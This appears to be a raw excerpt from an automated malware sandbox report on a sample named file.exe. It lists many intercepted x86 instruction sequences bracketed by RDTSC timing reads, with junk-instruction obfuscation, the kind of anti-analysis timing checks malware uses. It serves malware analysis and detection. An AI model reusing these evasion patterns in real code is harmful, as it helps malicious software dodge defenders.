                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 736CFE second address: 736D24 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD3C4C26357h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop esi 0x0000000a push eax 0x0000000b push ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e jne 00007FD3C4C26346h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 738D2E second address: 738D60 instructions: 0x00000000 rdtsc 0x00000002 je 00007FD3C4DD8D68h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e jmp 00007FD3C4DD8D6Ah 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007FD3C4DD8D78h 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 738D60 second address: 738D64 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 73BE45 second address: 73BEBD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD3C4DD8D73h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007FD3C4DD8D6Ch 0x0000000e popad 0x0000000f nop 0x00000010 mov ebx, dword ptr [ebp+12477564h] 0x00000016 push 00000000h 0x00000018 mov edi, dword ptr [ebp+122D184Fh] 0x0000001e push 00000000h 0x00000020 push 00000000h 0x00000022 push edi 0x00000023 call 00007FD3C4DD8D68h 0x00000028 pop edi 0x00000029 mov dword ptr [esp+04h], edi 0x0000002d add dword ptr [esp+04h], 0000001Ch 0x00000035 inc edi 0x00000036 push edi 0x00000037 ret 0x00000038 pop edi 0x00000039 ret 0x0000003a xor ebx, dword ptr [ebp+122D3AA4h] 0x00000040 jg 00007FD3C4DD8D67h 0x00000046 push eax 0x00000047 pushad 0x00000048 push eax 0x00000049 push edx 0x0000004a jmp 00007FD3C4DD8D6Eh 0x0000004f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 73DF6F second address: 73DF8B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD3C4C26353h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 739E26 second address: 739ED2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jmp 00007FD3C4DD8D6Dh 0x0000000a popad 0x0000000b nop 0x0000000c jmp 00007FD3C4DD8D76h 0x00000011 push dword ptr fs:[00000000h] 0x00000018 push 00000000h 0x0000001a push ebp 0x0000001b call 00007FD3C4DD8D68h 0x00000020 pop ebp 0x00000021 mov dword ptr [esp+04h], ebp 0x00000025 add dword ptr [esp+04h], 00000014h 0x0000002d inc ebp 0x0000002e push ebp 0x0000002f ret 0x00000030 pop ebp 0x00000031 ret 0x00000032 mov ebx, dword ptr [ebp+122D18C6h] 0x00000038 mov dword ptr fs:[00000000h], esp 0x0000003f mov ebx, dword ptr [ebp+122D24AFh] 0x00000045 mov bh, 76h 0x00000047 mov eax, dword ptr [ebp+122D1381h] 0x0000004d push 00000000h 0x0000004f push edi 0x00000050 call 00007FD3C4DD8D68h 0x00000055 pop edi 0x00000056 mov dword ptr [esp+04h], edi 0x0000005a add dword ptr [esp+04h], 00000019h 0x00000062 inc edi 0x00000063 push edi 0x00000064 ret 0x00000065 pop edi 0x00000066 ret 0x00000067 jmp 00007FD3C4DD8D70h 0x0000006c push FFFFFFFFh 0x0000006e mov ebx, eax 0x00000070 nop 0x00000071 jc 00007FD3C4DD8D78h 0x00000077 push eax 0x00000078 push edx 0x00000079 jne 00007FD3C4DD8D66h 0x0000007f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 740123 second address: 740137 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FD3C4C2634Ch 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 740137 second address: 740141 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007FD3C4DD8D66h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 73F287 second address: 73F28E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 740141 second address: 740145 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 74110A second address: 74111A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 pushad 0x00000008 js 00007FD3C4C2634Ch 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6E9635 second address: 6E963B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6E963B second address: 6E963F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6E963F second address: 6E9643 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 74FF71 second address: 74FFA8 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FD3C4C26346h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b mov eax, dword ptr [eax] 0x0000000d jmp 00007FD3C4C26357h 0x00000012 mov dword ptr [esp+04h], eax 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007FD3C4C2634Bh 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 74FFA8 second address: 74FFAE instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 75007B second address: 7500AF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jns 00007FD3C4C26346h 0x00000009 push edx 0x0000000a pop edx 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f jmp 00007FD3C4C26354h 0x00000014 mov eax, dword ptr [esp+04h] 0x00000018 pushad 0x00000019 jl 00007FD3C4C26348h 0x0000001f pushad 0x00000020 popad 0x00000021 push eax 0x00000022 push edx 0x00000023 push eax 0x00000024 pop eax 0x00000025 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7500AF second address: 7500CE instructions: 0x00000000 rdtsc 0x00000002 js 00007FD3C4DD8D66h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov eax, dword ptr [eax] 0x0000000d je 00007FD3C4DD8D6Ah 0x00000013 push ecx 0x00000014 pushad 0x00000015 popad 0x00000016 pop ecx 0x00000017 mov dword ptr [esp+04h], eax 0x0000001b pushad 0x0000001c push ecx 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 756A0A second address: 756A1F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007FD3C4C26346h 0x0000000a jmp 00007FD3C4C2634Bh 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 756CD5 second address: 756CDD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 756CDD second address: 756CFA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FD3C4C26350h 0x0000000c jnl 00007FD3C4C26346h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 756FB6 second address: 756FE3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD3C4DD8D71h 0x00000007 jmp 00007FD3C4DD8D78h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7572B0 second address: 7572B4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 75C857 second address: 75C85F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 75B607 second address: 75B623 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD3C4C26358h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 75C09F second address: 75C0A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 75C0A4 second address: 75C0A9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 75C0A9 second address: 75C0E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FD3C4DD8D66h 0x0000000a jmp 00007FD3C4DD8D75h 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007FD3C4DD8D78h 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 75C0E7 second address: 75C10A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD3C4C26354h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b pop eax 0x0000000c jnl 00007FD3C4C26346h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 75C10A second address: 75C110 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 75C110 second address: 75C115 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 75C572 second address: 75C577 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 75C577 second address: 75C58F instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FD3C4C2634Eh 0x00000008 jns 00007FD3C4C26346h 0x0000000e push esi 0x0000000f pop esi 0x00000010 jc 00007FD3C4C2634Ch 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7622FB second address: 762303 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 762303 second address: 762309 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 762309 second address: 76231A instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jg 00007FD3C4DD8D66h 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 76231A second address: 762345 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push edx 0x00000008 jmp 00007FD3C4C2634Eh 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FD3C4C26353h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 762345 second address: 762349 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 76127E second address: 76129B instructions: 0x00000000 rdtsc 0x00000002 jns 00007FD3C4C26346h 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push edi 0x0000000d jmp 00007FD3C4C2634Fh 0x00000012 pop edi 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 76129B second address: 7612A5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007FD3C4DD8D66h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7612A5 second address: 7612AB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 76154F second address: 761553 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 761553 second address: 7615A5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jno 00007FD3C4C26346h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jp 00007FD3C4C2634Ch 0x00000012 jmp 00007FD3C4C26355h 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007FD3C4C26353h 0x0000001f jmp 00007FD3C4C2634Fh 0x00000024 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7615A5 second address: 7615AB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7616F5 second address: 7616F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7616F9 second address: 761712 instructions: 0x00000000 rdtsc 0x00000002 js 00007FD3C4DD8D66h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push esi 0x0000000b pushad 0x0000000c popad 0x0000000d pushad 0x0000000e popad 0x0000000f pop esi 0x00000010 push edi 0x00000011 push eax 0x00000012 push edx 0x00000013 ja 00007FD3C4DD8D66h 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 761977 second address: 761998 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 jmp 00007FD3C4C26350h 0x0000000d jne 00007FD3C4C26346h 0x00000013 pushad 0x00000014 popad 0x00000015 popad 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 761AD1 second address: 761AD7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 761AD7 second address: 761B25 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jbe 00007FD3C4C26346h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push esi 0x0000000d pushad 0x0000000e jmp 00007FD3C4C26352h 0x00000013 jmp 00007FD3C4C26352h 0x00000018 jmp 00007FD3C4C26357h 0x0000001d popad 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 761B25 second address: 761B3D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD3C4DD8D74h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 761B3D second address: 761B41 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 761C8B second address: 761C93 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7620F3 second address: 7620F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7620F7 second address: 762114 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD3C5224499h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 762114 second address: 762123 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 jc 00007FD3C500B9D6h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 762123 second address: 762156 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop edi 0x00000006 pushad 0x00000007 jns 00007FD3C522449Ah 0x0000000d push eax 0x0000000e push edx 0x0000000f push edx 0x00000010 pop edx 0x00000011 jmp 00007FD3C522448Eh 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 762156 second address: 762196 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FD3C500B9D6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jmp 00007FD3C500B9DCh 0x00000012 pushad 0x00000013 popad 0x00000014 ja 00007FD3C500B9D6h 0x0000001a pushad 0x0000001b popad 0x0000001c popad 0x0000001d pushad 0x0000001e jmp 00007FD3C500B9E9h 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7609C9 second address: 7609F4 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FD3C52244A5h 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7609F4 second address: 7609F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7609F8 second address: 760A08 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push edi 0x0000000f pop edi 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 760A08 second address: 760A25 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a jmp 00007FD3C500B9E3h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 760A25 second address: 760A3F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jmp 00007FD3C5224494h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 760A3F second address: 760A47 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push esi 0x00000007 pop esi 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7653C5 second address: 7653C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7653C9 second address: 7653CD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7653CD second address: 765406 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FD3C5224491h 0x0000000b popad 0x0000000c jo 00007FD3C52244A6h 0x00000012 jmp 00007FD3C5224496h 0x00000017 pushad 0x00000018 push eax 0x00000019 pop eax 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6E2B24 second address: 6E2B38 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD3C500B9E0h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6E2B38 second address: 6E2B45 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FD3C5224486h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6E2B45 second address: 6E2B61 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 ja 00007FD3C500B9D6h 0x0000000c popad 0x0000000d pop esi 0x0000000e jc 00007FD3C500B9E8h 0x00000014 push eax 0x00000015 push edx 0x00000016 jns 00007FD3C500B9D6h 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 769BC1 second address: 769BCA instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pushad 0x00000004 popad 0x00000005 pop esi 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 769BCA second address: 769C22 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushad 0x00000008 js 00007FD3C500B9EEh 0x0000000e jmp 00007FD3C500B9E6h 0x00000013 push ecx 0x00000014 pop ecx 0x00000015 jmp 00007FD3C500B9DAh 0x0000001a jmp 00007FD3C500B9DCh 0x0000001f push eax 0x00000020 push edx 0x00000021 jmp 00007FD3C500B9E8h 0x00000026 pushad 0x00000027 popad 0x00000028 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7688D6 second address: 7688F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edi 0x00000006 jmp 00007FD3C5224494h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72FA8D second address: 72FA97 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007FD3C500B9D6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72FA97 second address: 70F239 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD3C5224493h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], eax 0x0000000e push 00000000h 0x00000010 push esi 0x00000011 call 00007FD3C5224488h 0x00000016 pop esi 0x00000017 mov dword ptr [esp+04h], esi 0x0000001b add dword ptr [esp+04h], 00000018h 0x00000023 inc esi 0x00000024 push esi 0x00000025 ret 0x00000026 pop esi 0x00000027 ret 0x00000028 push eax 0x00000029 mov dh, 51h 0x0000002b pop edi 0x0000002c call dword ptr [ebp+122D1D22h] 0x00000032 pushad 0x00000033 push eax 0x00000034 push edx 0x00000035 jmp 00007FD3C5224490h 0x0000003a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 73002A second address: 730034 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push esi 0x00000009 pop esi 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 730034 second address: 730038 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7301BE second address: 7301C4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7301C4 second address: 7301C8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7301C8 second address: 7301DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 js 00007FD3C500B9E2h 0x0000000f jbe 00007FD3C500B9DCh 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7301DF second address: 730215 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 xchg eax, esi 0x00000005 push 00000000h 0x00000007 push ebx 0x00000008 call 00007FD3C5224488h 0x0000000d pop ebx 0x0000000e mov dword ptr [esp+04h], ebx 0x00000012 add dword ptr [esp+04h], 00000014h 0x0000001a inc ebx 0x0000001b push ebx 0x0000001c ret 0x0000001d pop ebx 0x0000001e ret 0x0000001f add edi, 5BC1C840h 0x00000025 push eax 0x00000026 push eax 0x00000027 push edx 0x00000028 push eax 0x00000029 push edx 0x0000002a jmp 00007FD3C522448Ah 0x0000002f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 730215 second address: 73021B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 73021B second address: 730232 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FD3C5224492h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 730A65 second address: 730A6C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 rdtsc
